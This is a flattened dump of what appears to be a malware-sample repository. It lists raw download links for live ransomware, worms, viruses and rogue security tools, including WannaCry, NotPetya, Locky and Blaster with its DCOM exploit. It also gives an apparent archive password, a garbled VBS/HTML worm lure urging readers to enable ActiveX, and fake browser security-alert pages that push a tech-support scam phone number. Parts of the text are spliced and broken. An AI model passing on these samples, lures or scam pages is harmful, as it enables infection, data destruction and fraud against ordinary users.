https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Krotten.exe -------------------------------------------------------------------------------- /ランサムウェア/Locky.AZ.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Locky.AZ.exe -------------------------------------------------------------------------------- /ランサムウェア/Monster Ransomware (second new version).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Monster Ransomware (second new version).zip -------------------------------------------------------------------------------- /ランサムウェア/Monster Ransomware.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Monster Ransomware.zip -------------------------------------------------------------------------------- /ランサムウェア/NoMoreRansom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/NoMoreRansom.exe -------------------------------------------------------------------------------- /ランサムウェア/NotPetya.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/NotPetya.exe -------------------------------------------------------------------------------- /ランサムウェア/Petya.A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Petya.A.exe -------------------------------------------------------------------------------- /ランサムウェア/PolyRansom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/PolyRansom.exe -------------------------------------------------------------------------------- /ランサムウェア/PowerPoint.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/PowerPoint.exe -------------------------------------------------------------------------------- /ランサムウェア/Ransomware.Locky.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Ransomware.Locky.zip -------------------------------------------------------------------------------- /ランサムウェア/Ransomware.Satana.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Ransomware.Satana.zip -------------------------------------------------------------------------------- /ランサムウェア/Ransomware.Wannacry_Plus.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Ransomware.Wannacry_Plus.zip -------------------------------------------------------------------------------- /ランサムウェア/RedEye.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/RedEye.exe -------------------------------------------------------------------------------- /ランサムウェア/Rensenware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Rensenware.exe -------------------------------------------------------------------------------- /ランサムウェア/SporaRansomware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/SporaRansomware.exe -------------------------------------------------------------------------------- /ランサムウェア/UIWIX.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/UIWIX.exe -------------------------------------------------------------------------------- /ランサムウェア/ViraLock.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/ViraLock.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/WannaCry.txt: -------------------------------------------------------------------------------- 1 | WNcry@2ol7 -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/WannaCrypt0r.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/WannaCrypt0r.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/WannaCrypt0r.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/WannaCrypt0r.zip -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/c.wnry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/c.wnry -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/s.wnry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/s.wnry -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/taskdl.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/taskdl.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/taskse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/taskse.exe -------------------------------------------------------------------------------- /ランサムウェア/WannaCry/u.wnry: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCry/u.wnry -------------------------------------------------------------------------------- /ランサムウェア/WannaCrypt0r.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WannaCrypt0r.exe -------------------------------------------------------------------------------- /ランサムウェア/WinlockerVB6Blacksod.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/WinlockerVB6Blacksod.exe -------------------------------------------------------------------------------- /ランサムウェア/Xyeta.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/Xyeta.exe -------------------------------------------------------------------------------- /ランサムウェア/anabelle Ransomware.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/anabelle Ransomware.exe -------------------------------------------------------------------------------- /ランサムウェア/satan.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ランサムウェア/satan.exe -------------------------------------------------------------------------------- /ローグ/AdwereCleaner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ローグ/AdwereCleaner.exe -------------------------------------------------------------------------------- /ローグ/SpySheriff.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ローグ/SpySheriff.exe -------------------------------------------------------------------------------- /ワーム/Blaster/607B60AD512C50B7D71DCCC057E85F1C: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/607B60AD512C50B7D71DCCC057E85F1C -------------------------------------------------------------------------------- /ワーム/Blaster/8676210e6246948201aa014db471de90: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/8676210e6246948201aa014db471de90 -------------------------------------------------------------------------------- /ワーム/Blaster/8a17f336f86e81f04d8e66fa23f9b36a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/8a17f336f86e81f04d8e66fa23f9b36a -------------------------------------------------------------------------------- /ワーム/Blaster/DComExploit.exe.vir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/DComExploit.exe.vir -------------------------------------------------------------------------------- /ワーム/Blaster/SANS_ Malware FAQ_ What is W32_Blaster worm_.mht: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/SANS_ Malware FAQ_ What is W32_Blaster worm_.mht -------------------------------------------------------------------------------- /ワーム/Blaster/dcom.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Blaster/dcom.c -------------------------------------------------------------------------------- /ワーム/Bumerang.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Bumerang.exe -------------------------------------------------------------------------------- /ワーム/HeadTail.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/HeadTail.vbs -------------------------------------------------------------------------------- /ワーム/Heap41A.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Heap41A.exe -------------------------------------------------------------------------------- /ワーム/NadIote/Nadlote.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/NadIote/Nadlote.exe -------------------------------------------------------------------------------- /ワーム/Vobfus/Vobus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ワーム/Vobfus/Vobus.exe --------------------------------------------------------------------------------
This HTML file need ActiveX Control-?p>
To Enable to read this HTML file- Please press #-#YES#-# button to 221 | Enable ActiveX-?p>"&vbcrlf& _ 222 | "-?CENTER>----------z--------------------z-----------?MARQU EE> "&vbcrlf& _ 224 | "-?BODY>-?HTML>"&vbcrlf& _ 225 | " 199 | -------------------------------------------------------------------------------- /emailワーム/Silver/Silver.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Silver/Silver.exe -------------------------------------------------------------------------------- /emailワーム/Trood.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Trood.a.exe -------------------------------------------------------------------------------- /emailワーム/White.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/White.a.exe -------------------------------------------------------------------------------- /emailワーム/Winevar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Winevar.exe -------------------------------------------------------------------------------- /emailワーム/Xanax.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Xanax.exe -------------------------------------------------------------------------------- /emailワーム/Yarner.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/Yarner.a.exe -------------------------------------------------------------------------------- /emailワーム/ZippedFiles.a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/emailワーム/ZippedFiles.a.exe -------------------------------------------------------------------------------- /ウイルス/Floxif/Floxif.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Floxif/Floxif.exe -------------------------------------------------------------------------------- /ウイルス/Gnil/Gnil.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Gnil/Gnil.exe -------------------------------------------------------------------------------- /ウイルス/Mabezat/Mabezat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Mabezat/Mabezat.exe -------------------------------------------------------------------------------- /ウイルス/MadMan.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/MadMan.exe -------------------------------------------------------------------------------- /ウイルス/Melissa.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Melissa.doc -------------------------------------------------------------------------------- /ウイルス/Walker.com: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Walker.com -------------------------------------------------------------------------------- /ウイルス/Xpaj/xpaj.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Xpaj/xpaj.exe -------------------------------------------------------------------------------- /ウイルス/Xpaj/xpajB.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ウイルス/Xpaj/xpajB.exe -------------------------------------------------------------------------------- /ジョーク/457e2ff0c574450293784666d4cbf8ed93339dd7ee0144248aaef3054b247a1e.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/457e2ff0c574450293784666d4cbf8ed93339dd7ee0144248aaef3054b247a1e.exe -------------------------------------------------------------------------------- /ジョーク/Avoid.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Avoid.exe -------------------------------------------------------------------------------- /ジョーク/AxInterop.ShockwaveFlashObjects.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/AxInterop.ShockwaveFlashObjects.dll -------------------------------------------------------------------------------- /ジョーク/BluescreenSimulator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/BluescreenSimulator.exe -------------------------------------------------------------------------------- /ジョーク/ChilledWindows.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/ChilledWindows.exe -------------------------------------------------------------------------------- /ジョーク/Computer Shop.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Computer Shop.exe -------------------------------------------------------------------------------- /ジョーク/CookieClickerHack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/CookieClickerHack.exe -------------------------------------------------------------------------------- /ジョーク/CrazyNCS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/CrazyNCS.exe -------------------------------------------------------------------------------- /ジョーク/Curfun.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Curfun.exe -------------------------------------------------------------------------------- /ジョーク/DefenderUninstallTool.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/DefenderUninstallTool.exe -------------------------------------------------------------------------------- /ジョーク/DesktopBoom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/DesktopBoom.exe -------------------------------------------------------------------------------- /ジョーク/Document1.docx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/Document1.docx.exe -------------------------------------------------------------------------------- /ジョーク/add_remove.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/add_remove.exe -------------------------------------------------------------------------------- /ジョーク/bomb.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/bomb.exe -------------------------------------------------------------------------------- /ジョーク/cd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/cd.exe -------------------------------------------------------------------------------- /ジョーク/clickme.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/clickme.exe -------------------------------------------------------------------------------- /ジョーク/clippy.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/clippy.exe -------------------------------------------------------------------------------- /ジョーク/cmdchat.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/cmdchat.exe -------------------------------------------------------------------------------- /ジョーク/error byMist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mist0090/MalwareDatabase/ad083e7ba14408369ed7b61513ce56b338c39b28/ジョーク/error byMist.exe -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/css: -------------------------------------------------------------------------------- 1 | /* tamil */ 2 | @font-face { 3 | font-family: 'Catamaran'; 4 | font-style: normal; 5 | font-weight: 100; 6 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc-WS8h3n1nFPP5cmXoNgba8.woff2) format('woff2'); 7 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 8 | } 9 | /* latin-ext */ 10 | @font-face { 11 | font-family: 'Catamaran'; 12 | font-style: normal; 13 | font-weight: 100; 14 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAcyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 15 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 16 | } 17 | /* latin */ 18 | @font-face { 19 | font-family: 'Catamaran'; 20 | font-style: normal; 21 | font-weight: 100; 22 | src: local('Catamaran Thin'), local('Catamaran-Thin'), url(https://fonts.gstatic.com/s/catamaran/v1/AsJXcel0VOprDS7k9OVAc44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 23 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 24 | } 25 | /* tamil */ 26 | @font-face { 27 | font-family: 'Catamaran'; 28 | font-style: normal; 29 | font-weight: 400; 30 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/Q9cqF91R4Q6z47_V8UvFGBJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 31 | unicode-range: U+0964-0965, U+0B82-0BFA, U+200B-200D, U+20B9, U+25CC; 32 | } 33 | /* latin-ext */ 34 | @font-face { 35 | font-family: 'Catamaran'; 36 | font-style: normal; 37 | font-weight: 400; 38 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/t_-OVtQ5f4U5rdYNmrStgxJtnKITppOI_IvcXXDNrsc.woff2) format('woff2'); 39 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 40 | } 41 | /* latin */ 42 | @font-face { 43 | font-family: 'Catamaran'; 44 | font-style: normal; 45 | font-weight: 400; 46 | src: local('Catamaran'), local('Catamaran-Regular'), url(https://fonts.gstatic.com/s/catamaran/v1/iVYgK2bOLvZcSxr0ITOecltXRa8TVwTICgirnJhmVJw.woff2) format('woff2'); 47 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 48 | } 49 | /* cyrillic-ext */ 50 | @font-face { 51 | font-family: 'Roboto'; 52 | font-style: normal; 53 | font-weight: 400; 54 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/ek4gzZ-GeXAPcSbHtCeQI_esZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 55 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 56 | } 57 | /* cyrillic */ 58 | @font-face { 59 | font-family: 'Roboto'; 60 | font-style: normal; 61 | font-weight: 400; 62 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/mErvLBYg_cXG3rLvUsKT_fesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 63 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 64 | } 65 | /* greek-ext */ 66 | @font-face { 67 | font-family: 'Roboto'; 68 | font-style: normal; 69 | font-weight: 400; 70 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/-2n2p-_Y08sg57CNWQfKNvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 71 | unicode-range: U+1F00-1FFF; 72 | } 73 | /* greek */ 74 | @font-face { 75 | font-family: 'Roboto'; 76 | font-style: normal; 77 | font-weight: 400; 78 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/u0TOpm082MNkS5K0Q4rhqvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 79 | unicode-range: U+0370-03FF; 80 | } 81 | /* vietnamese */ 82 | @font-face { 83 | font-family: 'Roboto'; 84 | font-style: normal; 85 | font-weight: 400; 86 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/NdF9MtnOpLzo-noMoG0miPesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 87 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 88 | } 89 | /* latin-ext */ 90 | @font-face { 91 | font-family: 'Roboto'; 92 | font-style: normal; 93 | font-weight: 400; 94 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/Fcx7Wwv8OzT71A3E1XOAjvesZW2xOQ-xsNqO47m55DA.woff2) format('woff2'); 95 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 96 | } 97 | /* latin */ 98 | @font-face { 99 | font-family: 'Roboto'; 100 | font-style: normal; 101 | font-weight: 400; 102 | src: local('Roboto'), local('Roboto-Regular'), url(https://fonts.gstatic.com/s/roboto/v15/CWB0XYA8bzo0kSThX0UTuA.woff2) format('woff2'); 103 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 104 | } 105 | /* cyrillic-ext */ 106 | @font-face { 107 | font-family: 'Roboto Mono'; 108 | font-style: normal; 109 | font-weight: 400; 110 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzTOQ_MqJVwkKsUn0wKzc2I.woff2) format('woff2'); 111 | unicode-range: U+0460-052F, U+20B4, U+2DE0-2DFF, U+A640-A69F; 112 | } 113 | /* cyrillic */ 114 | @font-face { 115 | font-family: 'Roboto Mono'; 116 | font-style: normal; 117 | font-weight: 400; 118 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYzUj_cnvWIuuBMVgbX098Mw.woff2) format('woff2'); 119 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 120 | } 121 | /* greek-ext */ 122 | @font-face { 123 | font-family: 'Roboto Mono'; 124 | font-style: normal; 125 | font-weight: 400; 126 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY0bcKLIaa1LC45dFaAfauRA.woff2) format('woff2'); 127 | unicode-range: U+1F00-1FFF; 128 | } 129 | /* greek */ 130 | @font-face { 131 | font-family: 'Roboto Mono'; 132 | font-style: normal; 133 | font-weight: 400; 134 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY2o_sUJ8uO4YLWRInS22T3Y.woff2) format('woff2'); 135 | unicode-range: U+0370-03FF; 136 | } 137 | /* vietnamese */ 138 | @font-face { 139 | font-family: 'Roboto Mono'; 140 | font-style: normal; 141 | font-weight: 400; 142 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY76up8jxqWt8HVA3mDhkV_0.woff2) format('woff2'); 143 | unicode-range: U+0102-0103, U+1EA0-1EF1, U+20AB; 144 | } 145 | /* latin-ext */ 146 | @font-face { 147 | font-family: 'Roboto Mono'; 148 | font-style: normal; 149 | font-weight: 400; 150 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpYyYE0-AqJ3nfInTTiDXDjU4.woff2) format('woff2'); 151 | unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF; 152 | } 153 | /* latin */ 154 | @font-face { 155 | font-family: 'Roboto Mono'; 156 | font-style: normal; 157 | font-weight: 400; 158 | src: local('Roboto Mono'), local('RobotoMono-Regular'), url(https://fonts.gstatic.com/s/robotomono/v4/hMqPNLsu_dywMa4C_DEpY44P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'); 159 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000; 160 | } 161 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Microsoft Security Error & Warning 5 | 6 | 7 | 8 | 9 | 10 | 11 | 97 | 98 | 116 | 117 | 118 | 119 | 120 | Your computer has been Locked 121 | Your computer with the IP address 182.44.57.91 has been infected by the Virus RDN/YahLover.worm!055BCCAC9FEC -- Because System Activation KEY has expired & Your information (for example, passwords, messages, and credit cards) have been stolen. Call the Technical Support number +1-800-385-4507 to protect your files and identity from further damage. 122 | 123 | 124 | 125 | 126 | 127 | Automatically report details of possible security incidents to Google. Privacy policy 128 | 129 | 130 | +1-800-385-4507 131 | Back to safety 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /ジョークサイト/Fake Chrome Alert/index2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Google Security Warning 5 | 6 | 7 | 8 | 9 | 10 | 96 | 97 | 115 | 116 | 117 | 118 | 119 | Your computer has been Locked 120 | Your computer with the IP address 182.54.97.91 has been infected by the Virus RDN/YahLover.worm!055BCCAC9FEC -- Because System Activation KEY has expired & Your information (for example, passwords, messages, and credit cards) have been stolen. Call the Technical Support number +1-800-385-4507 to protect your files and identity from further damage. 121 | 122 | 123 | 124 | 125 | 126 | Automatically report details of possible security incidents to Google. Privacy policy 127 | 128 | 129 | +1-800-385-4507 130 | Back to safety 131 | 132 | 133 | 134 | 135 | 136 